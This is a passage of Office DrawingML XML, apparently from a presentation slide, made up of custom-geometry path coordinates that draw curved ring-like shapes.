                  <a:lnTo>
                    <a:pt x="196730" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="2423160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421635" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420590" y="1159333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417479" y="1109037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2412343" y="1059332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2405222" y="1010254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396154" y="961840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385179" y="914126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372337" y="867149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357667" y="820946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2341210" y="775554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323004" y="731008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303088" y="687347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2281504" y="644606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258290" y="602822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="562031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207129" y="522271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2179263" y="483578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149924" y="445989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119154" y="409540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086991" y="374269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1659381" y="804926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690709" y="842626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718966" y="882483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1743987" y="924357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1765609" y="968110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783668" y="1013602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798000" y="1060694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808440" y="1109248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814824" y="1159123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816989" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815155" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809744" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800895" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788742" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773424" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755076" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733836" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709841" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683228" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654132" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622692" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589043" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553323" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515669" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476218" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435105" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392469" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348445" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303171" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256784" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="1815211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1162802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1116434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1071212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1027269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="984738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="943753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="904446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="866952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="831403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="797932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="766673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="737759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="711323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="687498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="666417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="648214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="620974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="606844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251527" y="606577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293098" y="611044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333597" y="618154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372489" y="627634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346684" y="583669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322517" y="538846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300027" y="493202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279251" y="446775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260227" y="399603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242993" y="351725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227586" y="303178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214044" y="254001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202406" y="204232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192708" y="153910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184989" y="103071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179287" y="51755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175639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886956" y="4503420"/>
              <a:ext cx="2421890" cy="2110740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2110740">
                  <a:moveTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256765" y="606862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303097" y="612275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348283" y="621129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392191" y="633288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434687" y="648614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475638" y="666971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514912" y="688222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552375" y="712230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587893" y="738858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621335" y="767970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652567" y="799429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681456" y="833097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707869" y="868839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731673" y="906516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752734" y="945993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1770921" y="987132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786099" y="1029797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798135" y="1073851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806898" y="1119156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1812253" y="1165577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814068" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811704" y="1266822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1804736" y="1319423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793348" y="1370569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777723" y="1420050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758046" y="1467656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734500" y="1513176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707269" y="1556401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676538" y="1597121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642491" y="1635124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627727" y="1650325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598199" y="1681773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583436" y="1696973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027936" y="2110740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2040530" y="2096456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053161" y="2082958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065815" y="2069984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2057272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2054478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111127" y="2019580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142417" y="1983375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172304" y="1945909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200743" y="1907230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227685" y="1867384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2253086" y="1826417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276897" y="1784375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299071" y="1741306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319681" y="1696973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338419" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2355312" y="1606394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370474" y="1559677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383767" y="1512164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2395143" y="1463902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404556" y="1414937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411978" y="1365128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417309" y="1314997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420545" y="1264289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421636" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1164199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1115910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1068145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1020940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="974333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="928359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="883055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="838456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="794600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="751522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="709258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="667845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="627319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2421890" h="2110740">
                  <a:moveTo>
                    <a:pt x="1209421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="3829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="8561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="15123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="23479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="33592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="45426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="58946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="74114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="90894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="109251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="129147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="150547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="173414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="197713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="223406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="250458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="278832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="308492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="339402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="371525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="404825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="439267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="474813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="511428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196730" y="549074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="587717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="627319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="667845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="709258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="751522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="794600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="838456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="883055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="928359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="974333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1020940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1068145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1115910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1164199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047" y="1264289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4168" y="1315084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9330" y="1365315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16441" y="1414617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25535" y="1463423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36548" y="1511504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49444" y="1558818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64186" y="1605325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80736" y="1650982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99057" y="1695747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="1739581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140867" y="1782439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164281" y="1824283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189319" y="1865069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215943" y="1904756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244117" y="1943302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273803" y="1980667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304965" y="2016808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2051684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2054478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371221" y="2088260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798829" y="1657603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793115" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787526" y="1646427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781939" y="1640712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779145" y="1637918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748274" y="1603838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719934" y="1567524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694295" y="1529113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671526" y="1488741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651795" y="1446545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635273" y="1402662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622128" y="1357227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612529" y="1310376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606645" y="1262248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1165577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1119156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1073851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1029797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="987132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="945993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="906516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="868839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="833097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="799429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="767970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="738858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="712230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="688222"/>
                  </a:lnTo>
                  <a:lnTo>
